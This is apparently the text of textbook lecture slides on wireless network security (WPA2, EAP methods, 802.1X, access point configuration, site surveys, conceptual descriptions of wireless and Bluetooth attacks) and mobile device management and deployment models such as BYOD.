To set up WPA2, you need to have several parameters. The first element is to choose a security framework. When configuring an adapter to connect to an existing network, you need to match the choice of the network. When setting up your own network, you can choose whichever option you prefer. There are many selections, but for security purposes, you should choose WPA2-Personal or WPA2-Enterprise. Both of these require the choice of an encryption type, either TKIP or AES. TKIP has been deprecated, so choose AES. The last element is the choice of the network security key—the secret that is shared by all users. WPA2-Enterprise, which is designed to be used with an 802.1x authentication server that distributes different keys to each user, is typically used in business environments.

Current Security Methods (6 of 7)

Figure 12.5 WPA2 setup options in Windows

Principles of Computer Security, Fifth Edition

This figure shows the screens for a WPA2 setup in Windows.

Current Security Methods (7 of 7)

PSK vs. Enterprise vs. Open System

When building out a wireless network, you must decide how you are going to employ security on the network.

WPA and WPA2 two methods to establish a connection:

PSK and Enterprise

WEP-based systems two options:

Open System authentication and shared key authentication

Principles of Computer Security, Fifth Edition

Application Protocols (1 of 10)

Wireless networks have a need for secure authentication protocols.

EAP

Extensible Authentication Protocol (EAP) is defined in RFC 2284 (obsoleted by 3748).

EAP-TLS relies on Transport Layer Security (TLS)

EAP-TTLS works with the server authenticating to the client with a certificate, but the protocol tunnels the client side of the authentication, allowing the use of legacy authentication protocols

Principles of Computer Security, Fifth Edition

Application Protocols (2 of 10)

LEAP

Lightweight Extensible Authentication Protocol (LEAP) is a proprietary EAP designed by Cisco

Being phased out for newer protocols: PEAP or EAP-TLS

PEAP

PEAP, or Protected EAP, is an open standard.

Developed to protect the EAP communication by encapsulating it with TLS

Designed assuming a secure communication channel

Widely supported by vendors for use over wireless networks

Principles of Computer Security, Fifth Edition

Application Protocols (3 of 10)

EAP-FAST

EAP–Flexible Authentication via Secure Tunneling is described in RFC-4851 and proposed by Cisco to replace LEAP.

Offers a lightweight, tunneling protocol to enable authentication.

Distinguishing characteristic is the passing of a Protected Access Credential (PAC) that’s used to establish a TLS tunnel through which client credentials are verified.

Principles of Computer Security, Fifth Edition

Application Protocols (4 of 10)

EAP-TLS

EAP-TLS is an IETF open standard (RFC 5216) that uses the Transport Layer Security (TLS) protocol to secure the authentication process.

One of the most secure implementations

Because common implementations employ client-side certificates.

An attacker must also possess the key for the client side certificate to break the TLS channel.

Principles of Computer Security, Fifth Edition

Application Protocols (5 of 10)

EAP-TTLS

Is an extension of TLS called Tunneled TLS

The authentication process is protected by the tunnel from man-in-the-middle attacks,

Client certificates can be used but not required

Makes this easier to set up than EAP-TLS for clients without certificates.

Principles of Computer Security, Fifth Edition

Application Protocols (6 of 10)

Implementing 802.1X

The IEEE 802.1X protocol can support a wide variety of authentication methods and also fits well into existing authentication systems such as RADIUS and LDAP.

This allows 802.1X to interoperate well with other systems such as VPNs and dial-up RAS.

Three common methods are used to implement 802.1X: EAP-TLS, EAPTTLS, and EAP-MD5.

Principles of Computer Security, Fifth Edition

Three common methods are used to implement 802.1X: EAP-TLS, EAPTTLS, and EAP-MD5. EAP-TLS relies on TLS, an attempt to standardize the SSL structure to pass credentials. The standard, developed by Microsoft, uses X.509 certificates and offers dynamic WEP key generation. This means that the organization must have the ability to support the public key infrastructure (PKI) in the form of X.509 digital certificates. Also, per-user, per-session dynamically generated WEP keys help prevent anyone from cracking the WEP keys in use, as each user individually has her own WEP key. Even if a user were logged onto the AP and transmitted enough traffic to allow cracking of the WEP key, access would be gained only to that user’s traffic. No other user’s data would be compromised, and the attacker could not use the WEP key to connect to the AP. This standard authenticates the client to the AP, but it also authenticates the AP to the client, helping to avoid man-in-the-middle attacks. The main problem with the EAP-TLS protocol is that it is designed to work only with Microsoft’s Active Directory and Certificate Services; it will not take certificates from other certificate issuers. Thus a mixed environment would have implementation problems.

As discussed earlier, EAP-TTLS works much the same way as EAP-TLS, with the server authenticating to the client with a certificate, but the protocol tunnels the client side of the authentication, allowing the use of legacy authentication protocols such as Password Authentication Protocol (PAP), Challenge-Handshake Authentication Protocol (CHAP), MS-CHAP, or MSCHAP-V2. This makes the protocol more versatile while still supporting the enhanced security features such as dynamic WEP key assignment.

EAP-MD5, while it does improve the authentication of the client to the AP, does little else to improve the security of your AP. The protocol works by using the MD5 encryption protocol to hash a user’s username and password. This protocol, unfortunately, provides no way for the AP to authenticate with the client, and it does not provide for dynamic WEP key assignment. In the wireless environment, without strong two-way authentication, it is very easy for an attacker to perform a man-in-the-middle attack. Normally, these types of attacks are difficult to perform, requiring a traffic redirect of some kind, but wireless changes all those rules. By setting up a rogue AP, an attacker can attempt to get clients to connect to it as if it were authorized and then simply authenticate to the real AP, a simple way to have access to the network and the client’s credentials. The problem of not dynamically generating WEP keys is that it simply opens up the network to the same lack of confidentiality to which a normal AP is vulnerable. An attacker has to wait only for enough traffic to crack the WEP key, and he can then observe all traffic passing through the network.

Because the security of wireless LANs has been so problematic, many users have simply switched to a layered security approach—that is, they have moved their APs to untrustworthy portions of the network and have forced all clients to authenticate through the firewall to a third-party VPN system. The additional security comes at a price of putting more load on the firewall and VPN infrastructure and possibly adding cumbersome software to the users’ devices. While wireless can be set up in a very secure manner in this fashion, it can also be set up poorly. Some systems lack strong authentication of both endpoints, leading to possibilities of a man-in-the-middle attack. Also, even though the data is tunneled through, IP addresses are still sent in the clear, giving an attacker information about what and where your VPN endpoint is.

Another phenomenon of wireless is borne out of its wide availability and low price. All the security measures of the wired and wireless network can be defeated by the rogue AP. This is the third possible type of rogue access point discussed in this chapter; they all share the same name as they all represent a security breach. However, since they are implemented with different motives and accordingly pose slightly different threats, we discuss them all separately. In this case, a well-intentioned employee who is trying to make the work environment more convenient purchases an AP at a local retailer and installs it. When installed, it works fine, but it typically will have no security installed. Since the IT department doesn’t know about it, it is an uncontrolled entry point into the network.

No matter what kind of rogue AP we are dealing with, the rogue AP must be detected and controlled. The most common way to control rogue APs is some form of wireless scanning to ensure only legitimate wireless is in place at an organization. While complete wireless IDSs will detect APs, this can also be done with a laptop and free software.

Application Protocols (7 of 10)

EAP-TLS relies on TLS, an attempt to standardize the SSL structure to pass credentials.

EAP-TTLS works much the same way as EAP-TLS.

The server authenticates to the client with a certificate.

The protocol tunnels the client side of the authentication, allowing the use of legacy authentication protocols.

Principles of Computer Security, Fifth Edition

Application Protocols (8 of 10)

RADIUS federation

Using a series of RADIUS servers in a federated connection has been employed in several worldwide RADIUS Federation networks.

A user packages their credentials at a local access point using a certificate-based tunneling protocol method.

First RADIUS server determines which RADIUS server to send the request to, and from there the user is authenticated via their home RADIUS server and the results passed back, permitting a joining to the network.

Principles of Computer Security, Fifth Edition

Application Protocols (9 of 10)

RADIUS federation (continued)

Because the credentials must pass multiple different networks, the EAP methods are limited to those with certificates and credentials to prevent loss of credentials during transit.

This type of federated identity at global scale demonstrates the power of RADIUS and EAP methods.

Principles of Computer Security, Fifth Edition

Application Protocols (10 of 10)

CCMP

Stands for Counter Mode with Cipher Block Chaining–Message Authentication Codes Protocol (or Counter Mode with CBC-MAC Protocol)

CCMP is a data encapsulation encryption mechanism designed for wireless use.

CCMP is the mode in which the AES cipher is used to provide message integrity.

CCMP requires new hardware to perform the AES encryption.

Principles of Computer Security, Fifth Edition

Wireless Systems Configuration

Wireless systems are more than just protocols.

Putting up a functional wireless system in a house is as easy as plugging in a wireless access point and connecting.

But in an enterprise, where multiple access points will be needed, the configuration takes significantly more work.

Site surveys are needed to determine proper access point and antenna placement, as well as channels and power levels.

Principles of Computer Security, Fifth Edition

Access Point (1 of 2)

Wi-Fi access points are the point of entry for radio-based network signals into and out of a network.

Wireless access points can operate in several different modes,

Most common mode all access points support: Normal mode

Access point provides a point of connection from the wireless network to the wired network.

Principles of Computer Security, Fifth Edition

Access Point (2 of 2)

Bridged mode, allows an access point to communicate directly with another access point.

Allows the extension of a wireless LAN over greater distance.

Repeater mode extends the range by working between access points.

A bridge mode device allows connections, while a repeater merely acts to extend range.

Principles of Computer Security, Fifth Edition

Fat vs. Thin

Fat (or thick) access points refer to standalone access points

Thin access points refer to controller-based access points.

Each of these solutions differ in their handling of common functions such as configuration, encryption, updates, and policy settings.

Determining which is more effective requires a closer examination of the differences compared to a site’s needs and budget.

Principles of Computer Security, Fifth Edition

Controller Based vs. Standalone (1 of 2)

Small standalone Wi-Fi access points

Can have substantial capabilities with respect to authentication, encryption, and channel management.

As the wireless deployment grows in size and complexity, there are some advantages to a controller-based access point solution.

Principles of Computer Security, Fifth Edition

Controller Based vs. Standalone (2 of 2)

Controller based solutions

Allow for centralized management and control

Can facilitate better channel management for adjacent access points, better load balancing, and easier deployment of patches and firmware updates.

Offer security advantages in overall network monitoring and security controls.

Enable network access control based on user identity in large environments

Principles of Computer Security, Fifth Edition

SSID (1 of 2)

The 802.11 standard includes attempts at rudimentary authentication and confidentiality controls.

Authentication is handled in its most basic form by the 802.11 access point (AP), forcing clients to perform a handshake when attempting to “associate” to the AP.

Principles of Computer Security, Fifth Edition

SSID (2 of 2)

Service set identifier (SSID): authentication function

Unique 32-character identifier is attached to the header of the packet

Association occurs when the client has the correct parameters needed in the handshake, including the SSID.

SSID is a good idea in theory

It is sent in plaintext in the packets, so in practice SSID offers little security significance.

SSID does not provide true authentication.

Wireless scanning programs work by capturing the beacon frames, and thereby the SSIDs, of all APs.

Principles of Computer Security, Fifth Edition

Signal Strength

Usability of a wireless signal is directly related to its signal strength.

Factors that can influence signal strength

Transmitting power level

Environment across which the signal is transmitted

In buildings with significant metal in the walls and roofs, additional power may be needed to have sufficient signal strength at the receivers.

Wi-Fi power levels can be controlled by the hardware for a variety of reasons.

Principles of Computer Security, Fifth Edition

Band Selection/Width

Deployment of access points should support desired bands based on client needs.

Multi-band radio access points exist and are commonly employed to resolve client issues.

Wi-Fi operates over two different frequencies:

2.4 GHz for b/g and n

5 GHz for a, n, and ac

Principles of Computer Security, Fifth Edition

Antenna Types (1 of 2)

Omnidirectional antenna operates in all directions.

Covers the greatest area per antenna

Weakness occurs in corners and hard-to-reach areas

Yagi and panel antennas are directional in nature.

Panel antennas provide solid room performance while preventing signal bleed behind the antennas

Yagi antennas funnel the energy along a beam and allow longer communication distances using standard power

Enables eavesdroppers to capture signals from much greater distances

Principles of Computer Security, Fifth Edition

Wireless networking problems caused by weak signal strength can sometimes be solved by installing upgraded Wi-Fi radio antennas on the access points. On business networks, the complexity of multiple access points typically requires a comprehensive site survey to map the Wi-Fi signal strength in and around office buildings. Additional wireless access points can then be strategically placed where needed to resolve dead spots in coverage. For small businesses and homes, where a single access point may be all that is needed, an antenna upgrade may be a simpler and more cost-effective option to fix Wi-Fi signal problems.

Antenna Types (2 of 2)

Figure 12.6 Wireless access point antennas

Principles of Computer Security, Fifth Edition

This figure shows a sampling of common Wi-Fi antennas: (a) is a common home wireless router, (b) is a commercial indoor wireless access point, and (c) is an outdoor directional antenna. These can be visible as shown, or hidden above ceiling tiles.

Two common forms of upgraded antennas are the Yagi antenna and the panel antenna. An example of a Yagi antenna is shown in this figure (c).

Antenna Placement

The objective of antenna placement is to maximize the coverage over a physical area and reduce low-gain areas.

Can be very complex and frequently requires a site survey to determine proper placement

MIMO is a set of multiple-input and multiple-output antenna technologies where the available antennas are spread over a multitude of independent access points each having one or multiple antennas.

Principles of Computer Security, Fifth Edition

Wi-Fi is by nature a radio-based method of communication, and as such uses antennas to transmit and receive the signals. The actual design and placement of the antennas can have a significant effect on the usability of the radio frequency (RF) medium for carrying the traffic. Antennas come in a variety of types, each with its own transmission pattern and gain factor. High-gain antennas can deal with weaker signals, but also have more-limited coverage. Wide-coverage, omnidirectional antennas can cover wider areas, but at lower levels of gain.

Mimo can enhance the usable bandwidth and data transmission capacity between the access point and user. There are a wide variety of MIMO methods, and this technology, once considered cutting edge or advanced, is becoming mainstream.

Power Level Controls

Wi-Fi power levels can be controlled by the hardware for a variety of reasons.

With lower power, there is less opportunity for interference.

If power levels are too low, signal strength limits range.

Access points can have the power level set either manually or via programmatic control.

For most users, default mode is the best option.

In complex setups, power level controls can increase capacity and control on the network.

Principles of Computer Security, Fifth Edition

Access points can have the power level set either manually or via programmatic control. For most users, power level controls are not very useful, and leaving the unit in default mode is the best option. In complex enterprise setups, with site surveys and planned overlapping zones, this aspect of signal control can be used to increase capacity and control on the network.

Site Surveys (1 of 2)

A site survey involves several steps:

Mapping the floor plan, testing for RF interference, testing for RF coverage, and analysis of material via software

The software can suggest placement of access points.

After deploying the APs, the site is surveyed again, mapping the results versus the predicted, watching signal strength and signal-to-noise ratios.

Site surveys can be used to ensure availability of wireless, especially when it is critical for users to have connections.

Principles of Computer Security, Fifth Edition

Exam Tip: Wireless networks are dependent upon radio signals to function. It is important to understand that antenna type, placement, and site surveys are used to ensure proper coverage of a site, including areas blocked by walls, interfering signals, and echoes.

Site Surveys (2 of 2)

Figure 12.7 Example site survey

Principles of Computer Security, Fifth Edition

This figure illustrates what a site survey looks like. The different shades indicate signal strength, showing where reception is strong and where it is weak.

MAC Filtering

MAC filtering is the selective admission of packets based on a list of approved Media Access Control (MAC) addresses.

Employed on switches – provides machine authentication

Wired networks – has the protection afforded by the wires, making interception of signals to determine their MAC addresses difficult

Wireless networks – suffers from the fact that an attacker can see the MAC addresses of all traffic to and from the access point, and then can spoof the MAC addresses that are permitted to communicate via the access point.

Principles of Computer Security, Fifth Edition

Captive Portals

Captive portal refers to a specific technique of using an HTTP client to handle authentication on a wireless network.

It is frequently employed in public hotspots and opens a web browser to an authentication page.

This occurs before the user is granted admission to the network.

The access point intercepts all packets and returns the web page for login.

The actual web server that serves up the authentication page can be in a walled-off section of the network.

Principles of Computer Security, Fifth Edition

Securing Public Wi-Fi

Issue associated with wireless transmissions is that they are subject to interception by anyone within range of the hotspot.

Possible for others to intercept and read traffic of anyone using the hotspot, unless encryption is used.

Common practice is to use wireless security, even when the intent is to open the channel for everyone.

Having a default password, even one that everyone knows, will make it so that people cannot observe other traffic.

Principles of Computer Security, Fifth Edition

There is an entire open wireless movement, designed around a sharing concept that promotes sharing of the Internet to all. For information, check out https://openwireless.org.

Replay

Replay attack occurs when the attacker captures a portion of a communication between two parties and retransmits it at a later time.

Replay attacks are associated with attempts to circumvent authentication mechanisms.

Best way to prevent replay attacks is with encryption, cryptographic authentication, and time stamps.

Principles of Computer Security, Fifth Edition

The initialization vector (IV) is used in wireless systems as the randomization element at the beginning of a connection.

Attacks against the IV aim to determine it which leads to finding the repeating key sequence.

The IV is the primary reason for the weaknesses in WEP.

This weakness led to the fall of WEP and WPA.

Principles of Computer Security, Fifth Edition

Evil Twin

Evil twin attack is an attack against the wireless protocol via substitute hardware

Attacker uses his enhanced access point (AP) to create a better connection to entice users and computers to attach to it.

Attackers can more easily analyze traffic and perform man-in-the-middle types of attacks with users connected to the evil access point.

For simple denial of service (DoS) attacker could use interference to jam the wireless signal.

Principles of Computer Security, Fifth Edition

Rogue AP

By setting up a rogue access point (AP), or rogue AP, an attacker can attempt to get clients to connect to it as if it were authorized and then simply authenticate to the real AP

Simple way to have access to network and client’s credentials.

Rogue APs can act as a man-in-the-middle and steal user’s credentials.

Enterprises with wireless APs should routinely scan for and remove rogue APs.

Principles of Computer Security, Fifth Edition

Jamming

Jamming is a form of denial of service, specifically against the radio spectrum aspect of wireless.

Jamming can enable things such as attachment to a rogue AP.

Principles of Computer Security, Fifth Edition

Specific Bluetooth Attacks

Bluejacking

The sending of unsolicited messages over Bluetooth to Bluetooth-enabled devices.

Bluesnarfing

The unauthorized access of information from a Bluetooth-enabled device through a Bluetooth connection.

Bluebugging

Using a Bluetooth-enabled device to eavesdrop on another person’s conversation using that person’s Bluetooth phone.

Bluetooth DoS

Using Bluetooth to preform a DoS attack.

Principles of Computer Security, Fifth Edition

RFID

Radio Frequency Identification (RFID) tags are used in tracking devices to tracking keys.

Active tags have a power source.

Passive tags utilize the RF energy transmitted to them for power.

Physical security is a security concern.

Several different attack types can be performed against RFID systems.

Principles of Computer Security, Fifth Edition

Disassociation

Disassociation attacks against a wireless system are those attacks designed to disassociate a host from the wireless access point, and from the wireless network.

Disassociation attacks stem from the deauthentication frame that is in the IEEE 802.11 (Wi-Fi) standard.

Disassociation attacks are not typically used alone, but rather in concert with another attack objective.

Principles of Computer Security, Fifth Edition

Mobile Device Management Concepts

Mobile device management (MDM) began as a marketing term for a collective set of commonly employed protection elements associated with mobile devices.

When viewed as a comprehensive set of security options for mobile devices, an MDM policy should be created and enforced by every corporation.

Password policies should extend to mobile devices, including lockout and, if possible, the automatic wiping of data.

Principles of Computer Security, Fifth Edition

Application Management

Applications request access to information stores on mobile devices

Mobile application management solution needed because of potential security problems

Restrict types of applications that can be downloaded and used on mobile devices

Provide an enterprise application store where only company-approved applications are available

May state that apps cannot come from any other source

May need to use an MDM solution

Principles of Computer Security, Fifth Edition

Full Device Encryption (FDE)

Protecting information on mobile devices is becoming a business imperative.

Consider encrypting mobile device data in case of loss or theft

Complete some rigorous market analysis to determine what commercial product meets your needs.

Principles of Computer Security, Fifth Edition

Content Management

Content management is the set of actions used to control content issues on mobile devices.

Content management goes beyond data ownership policy.

Examines what content belongs on what devices

Establishes mechanisms to enforce these rules

MDM solutions exist to assist in this security issue with respect to mobile devices.

Principles of Computer Security, Fifth Edition

Remote Wipe

Unlikely a lost or stolen device will be recovered.

Makes even encrypted data stored on a device more vulnerable to decryption.

Remote wiping a mobile device typically removes data stored on the device and resets the device to factory settings.

Principles of Computer Security, Fifth Edition

Geofencing

Geofencing is the use of GPS and/or RFID technology to create a virtual fence around a particular location, and to detect when devices cross the fence.

Enables devices to be recognized by location and have actions taken.

Geofencing is used in marketing to send messages to devices that are in a specific area.

Geofencing has been used for remote workers, notifying management when they have arrived at remote work sites.

Principles of Computer Security, Fifth Edition

Geolocation

Many apps rely heavily on GPS location

Device-locating services, mapping applications, traffic monitoring apps, and apps that locate nearby businesses such as gas stations and restaurants.

Geolocation: technology to track movement and location of mobile device.

Tracking can be used to assist in the recovery of lost devices.

Principles of Computer Security, Fifth Edition

Geo-tagging (1 of 2)

Geo-tagging is the posting of location information into a data stream signifying where the device was when the stream was created.

Many mobile devices include on-board cameras, and the photos/videos they take can divulge information

Geo-tagging can make location part of any picture or video.

Principles of Computer Security, Fifth Edition

Geo-tagging (2 of 2)

Posting photos with geo-tags embedded in them has its use.

Can unexpectedly divulge information users might not want to share.

It is recommended that it be disabled unless you have a specific reason for having the location information embedded in a photo.

Principles of Computer Security, Fifth Edition

Screen Locks

Screen-locking capability usually consists of entering a passcode or PIN to unlock the device.

Highly recommended that screen locks be enforced for all mobile devices.

Some more advanced forms of screen locks work in conjunction with device wiping.

Various lockout situations

Principles of Computer Security, Fifth Edition

Push Notification Services

Push notification services are services that deliver information to mobile devices without a specific request from the device.

Push notifications are used a lot in mobile devices to indicate that content has been updated.

Push notification methods are typically unique to the platform.

Principles of Computer Security, Fifth Edition

Passwords and Pins

Passwords and pins are common security measures used to protect mobile devices from unauthorized use.

These are essential tools and should be used in all cases, and mandated by company policy.

Principles of Computer Security, Fifth Edition

Biometrics

Biometrics are used across a wide range of mobile phones as a means of access control.

Newest biometric method: facial recognition

Based on a camera image of user holding their phone

Offers some promise but has similar concerns

It has been shown that these devices can be bypassed

One should consider them to be convenience features, not security features.

Principles of Computer Security, Fifth Edition

Context-Aware Authentication

Context-aware authentication is the use of information to make the authentication decision as to whether to permit the requested resource.

Goal is to prevent unauthorized end users, devices, or network connections from being able to access corporate data.

This approach can be used to allow an authorized user to access network-based resources from inside the office, but deny access if they are connecting via a public Wi-Fi network.

Principles of Computer Security, Fifth Edition

Containerization

Containerization on mobile devices refers to dividing the device into a series of containers.

One container holding work-related materials and the other personal materials.

Containers can separate apps, data, and virtually everything on the device.

Principles of Computer Security, Fifth Edition

Storage Segmentation

Storage segmentation involves separate virtual containers.

Personal data is kept separate from corporate data and applications.

This protection is strongly recommended for devices that are used to handle highly sensitive corporate data.

Principles of Computer Security, Fifth Edition

Asset Control

Asset control entails implementing a viable asset tracking and inventory control mechanism.

For security and liability reasons, the company needs to know what devices are connecting to its systems and what access has been granted.

Just as in IT systems, maintaining a list of approved devices is a critical control.

Principles of Computer Security, Fifth Edition

Device Access Control

Principles of access control for mobile devices need to be managed just like access control from wired or wireless desktops and laptops.

Device access control is critical as storage in the cloud and SaaS become more prevalent.

Rigorous data access principles need to be applied, and they become even more important with the inclusion of mobile devices as fully functional computing devices.

Review possible solutions

Principles of Computer Security, Fifth Edition

100

Removable Storage

Removable devices security needs must be addressed

All removable devices should be scanned by antivirus software upon connection to the corporate environment.

Corporate policies should address the copying of data to removable devices.

Many mobile devices can be connected via USB to a system and used to store data—and in some cases vast quantities of data.

Principles of Computer Security, Fifth Edition

101

Disabling Unused Features

As with all computing devices, features that are not used or that present a security risk should be disabled.

It is best to make Bluetooth connections undiscoverable.

Requiring Bluetooth connections to be undiscoverable is very hard to enforce but should be encouraged as a best practice.

Principles of Computer Security, Fifth Edition

102

Mobile Application Security

Applications that run on the devices represent security threats to the information that is stored on and processed by the device.

Applications are the software elements that can be used to violate security, even when the user is not aware.

Many games and utilities offer value to the user, but at the same time they scrape information stores on the device for information.

Principles of Computer Security, Fifth Edition

103

Application Control

App store provides apps and their updates in one convenient location for mobile devices.

In devices used on enterprise networks, the security provided by the app store may not meet the requirements of the business.

Separate application, known typically as the Mobile Device Manager (MDM) can handle device configuration as well as security.

Principles of Computer Security, Fifth Edition

104

Key and Credential Management

Key and credential management services are being integrated into most MDM services to ensure that existing strong policies and procedures can be extended to mobile platforms securely.

These services include protection of keys for digital signatures and S/MIME encryption and decryption.

Keys and credentials are among the highest-value items that can be found on mobile devices, so ensuring protection for them is a key element in mobile device security.

Principles of Computer Security, Fifth Edition

105

Authentication

When mobile devices are used to access business networks, authentication becomes an issue.

Mobile device can store certificates.

The authentication problem is moved to the endpoint, where it relies on passcodes, screen-locks, and other mobile device protections.

These can be weak unless structured together.

The risk in mobile authentication is that strong credentials stored in the device are protected by the less rigorous passcode and the end user.

Principles of Computer Security, Fifth Edition

106

Application Whitelisting

Application whitelisting and blacklisting enables you to control and block applications available on the device.

Whitelisting is the use of a preapproved list of behaviors – only those on the whitelist are allowed.

Blacklisting is the list of behaviors that are specifically blocked.

Principles of Computer Security, Fifth Edition

107

Encryption

Encrypt both the device and applications.

The only way to segregate data within the device is for apps to manage their own data stores through app-specific encryption.

Principles of Computer Security, Fifth Edition

108

Transitive Trust/Authentication

Trust relationships can be very complex in mobile devices, and often security aspects are not properly implemented.

Mobile devices tend to be used across numerous systems, including business, personal, public, and private.

This greatly expands the risk profile and opportunity for transitive trust–based attacks.

Mobile applications should be carefully reviewed to ensure that trust relationships are secure.

Principles of Computer Security, Fifth Edition

109

Policies for Enforcement and Monitoring

Your corporate policies regarding mobile devices should be consistent with your existing computer security policies.

Your training programs should include instruction on mobile device security.

Disciplinary actions should be consistent. Your monitoring programs should be enhanced to include monitoring and control of mobile devices.

Principles of Computer Security, Fifth Edition

110

Third-party App Stores

Third party app store is a mobile device manufacturer-associated application store where applications can be downloaded to the device.

The Apple store is built on a principle of exclusivity, and security is highly enforced on apps.

The Google store has less restrictions, which has translated into some security issues from apps.

Managing what applications a user can add to the device is essential because many of these applications can create security risks for the enterprise.

Principles of Computer Security, Fifth Edition

111

Rooting/Jailbreaking

A common hack associated with mobile devices is the jailbreak.

Jailbreaking is a process by which the user escalates their privilege level, bypassing the operating system’s controls and limitations.

Rooting a device is a process whereby OS controls are bypassed, and this is the term frequently used for Android devices.

The effect is the same whether the device is rooted or jailbroken

Principles of Computer Security, Fifth Edition

112

Sideloading

Sideloading is the process of adding apps to a mobile device without using the authorized store associated with the device.

Currently, sideloading only works on Android devices.

Sideloading is an alternative means of instantiating an app on the device without having to have it hosted on the app store.

The downside, simply put, is that without the app store screening, one is at greater risk of installing malicious software in the guise of a desired app.

Principles of Computer Security, Fifth Edition

113

Custom Firmware

Custom firmware is firmware for a device that has been altered from the original factory settings.

Can bring added functionality

Can result in security holes.

Should only be done on devices without access to critical information.

Principles of Computer Security, Fifth Edition

114

Carrier unlocking

If you have a carrier-locked device and you attempt to use a SIM card from another carrier, the phone will not accept it unless you unlock the device.

Carrier unlocking is the process of telling the device to sever itself from the carrier.

This is usually done through the inputting of a special key sequence that unlocks the device.

Principles of Computer Security, Fifth Edition

115

Firmware OTA updates

Firmware is software that requires updating.

With mobile devices being literarily everywhere, the scale does not support bringing the device to a central location or connection for updating.

Firmware OTA (over the air) updates are a solution to this problem.

It is possible to have a menu option that permits the device firmware to be updated. All major device manufacturers support this model because it is the only real workable solution.

Principles of Computer Security, Fifth Edition

116

Camera Use

Mobile devices include on-board cameras, and the photos/videos they take can divulge information.

Mobile devices may be used for illegal purposes.

This creates a liability for the company.

User concern is that their personal photos will be lost during a device wipe originated by the company.

Principles of Computer Security, Fifth Edition

117

SMS/MMS

Short Message Service (SMS) and Multimedia Messaging Service (MMS) are standard protocols used to send messages to and from mobile cellular devices

SMS

Limited to text-only messages of <160 characters

Because of the content connections that can be sent via MMS in particular, and SMS in certain cases, it is important to at least address these communication channels in relevant policies.

Principles of Computer Security, Fifth Edition

118

External media

External media refers to any item or device that can store data.

External media can deliver malware into the enterprise.

The risk is evident

The key is to develop a policy that determines where these devices can exist and where they should be banned, and then follow the plan with monitoring and enforcement.

Principles of Computer Security, Fifth Edition

119

USB OTG

USB OTG (USB On-The-Go) is an extension of USB technology that facilitates direct connection between USB OTG–enabled mobile devices.

USB OTG allows those devices to switch back and forth between the roles of host and device

USB OTG allows the connection of USB-based peripherals, such as keyboards, mice, and storage, to mobile devices.

Although USB OTG is relatively new, most mobile devices made since 2015 are USB OTG compatible.

Principles of Computer Security, Fifth Edition

120

Recording Microphone

Many of today’s electronic devices have the ability to record audio information.

Recording microphones can be used to record conversations and collect sensitive data, and the parties under observation are not even aware of the incident.

As with other high-tech gadgets, the key is to determine the policy of where they can be used and the rules for their use.

Principles of Computer Security, Fifth Edition

121

GPS Tagging

GPS tagging is the addition of GPS information to a files or folder, or other digital item.

Adding GPS information to the metadata of a file can add value in that it enables site specific information to be associated with the digital item.

This can be a location that a picture was taken, or map coordinates when linking to mapping software.

Principles of Computer Security, Fifth Edition

122

Wi-Fi Direct/Ad Hoc

In Wi-Fi direct, two Wi-Fi devices connect to each other in a single-hop connection.

One device acts as an access point for another device

The key element is the single hop nature of a Wi-Fi direct connection.

For Wi-Fi ad-hoc, the primary difference is that in the ad hoc network, multiple devices can communicate with each other, with each device capable of communicating with all other devices.

Principles of Computer Security, Fifth Edition

123

Tethering

Tethering is the connection of a device to a mobile device that has a means of accessing a network for the purpose of sharing network access.

Connecting a mobile phone to a laptop to charge the phone’s battery is not tethering.

Connecting it so that the laptop can use the phone to connect to the Internet is tethering.

Tethering introduces new outside-of-the-enterprise, span-of-control network connections:

It can act to bridge your enterprise network with the outside network.

Principles of Computer Security, Fifth Edition

124

Payment Methods

Today, we have new intermediaries:

Smart devices with NFC linked to credit cards offer a convenience alternative for payments.

Actual payment is still a credit/debit card charge, the payment pathway is through the digital device.

Utilizing the security features of the device, NFC, and biometrics/PIN, this form of payment has some advantages over the other methods.

It allows for the addition of specific security measures before the payment method is accessed.

Principles of Computer Security, Fifth Edition

125

Deployment Models

When determining how to incorporate mobile devices securely within the enterprise, you have a wide range of considerations.

How will security be enforced?

How will all the policies be enforced?

What devices will be supported in the enterprise?

There are a variety of deployment models

From employee-owned to corporate-owned, with mixtures of the two in between.

Each of these models has advantages and disadvantages.

Principles of Computer Security, Fifth Edition

126

CYOD

CYOD (choose your own device) users have a choice in the type of device.

In most cases, this choice is constrained to a list of acceptable devices that can be supported in the enterprise.

Because the device is corporate-owned, CYOD provides greater flexibility in corporate restrictions on device use, in terms of apps, data, updates, and so on.

Principles of Computer Security, Fifth Edition

127

COPE

COPE (company-issued, personally-enabled)

A model where employees are supplied a phone chosen and paid for by the company, but they are given permission to use it for personal activities.

The company can decide how much choice and freedom employees get with the personal use of the device.

This allows the enterprise to control security functionality while dealing with the employee dissatisfaction associated with the traditional method of supplying devices: corporate-owned business-only (COBO).

Principles of Computer Security, Fifth Edition

128

Corporate Owned

Corporate-owned business-only (COBO)

A model in which the business supplies a mobile device for company-only use on the part of the employee.

This has the disadvantage of the employee having to carry two devices—one personal and one for work—and then separate functions between the devices based on the purpose of use in each instance.

The advantage is that the corporation has complete control over the device and can apply any security controls desired without interference from other device functionality.

Principles of Computer Security, Fifth Edition

129

BYOD (1 of 12)

Permitting employees to “bring your own device” (BYOD) has many advantages in business.

Users tend to prefer having a single device rather than carrying multiple devices.

Users have less of a learning curve on devices they already have an interest in learning.

Disadvantage is that employees will not be eager to limit the use of their personal device based on corporate policies, so corporate control will be limited.

Principles of Computer Security, Fifth Edition

BYOD (2 of 12)

Data ownership

BYOD blurs the lines of data ownership.

If a company owns a smartphone issued to an employee, the company can repossess the phone upon employee termination.

Practice may protect company data by keeping the company-issued devices in the hands of employees only.

A company cannot rely on a simple factory reset before reissuing a device.

Personal device used for business purposes may have some company data remaining on the phone.

Principles of Computer Security, Fifth Edition

BYOD (3 of 12)

Storage Segmentation

Storage segmentation methods are needed whenever a device has multilevel data security types, as in personal and corporate, or corporate and highly sensitive corporate.

Having the ability to manage the separate data streams based on their sensitivity is important because of the highly mobile nature of the device.

Principles of Computer Security, Fifth Edition

BYOD (4 of 12)

Support ownership

Support costs for mobile devices are an important consideration for corporations.

Each device has its own implementation of various functions.

Support organization needs viable knowledge base articles and job aids to provide sufficient support for the wide variety of ever changing devices.

Principles of Computer Security, Fifth Edition

BYOD (5 of 12)

Patch management

Corporate policy should require mobile devices to be kept current with respect to patches.

It is an important best defense against viruses, malware, and other threats.

It is important to recognize that “jailbreaking” or “rooting” your device may remove the manufacturer’s security mechanisms and protection against malware and other threats.

Principles of Computer Security, Fifth Edition

BYOD (6 of 12)

Antivirus management

Mobile devices need protection against viruses and malware.

Forensics is a rapidly evolving, fast-changing field

Privacy

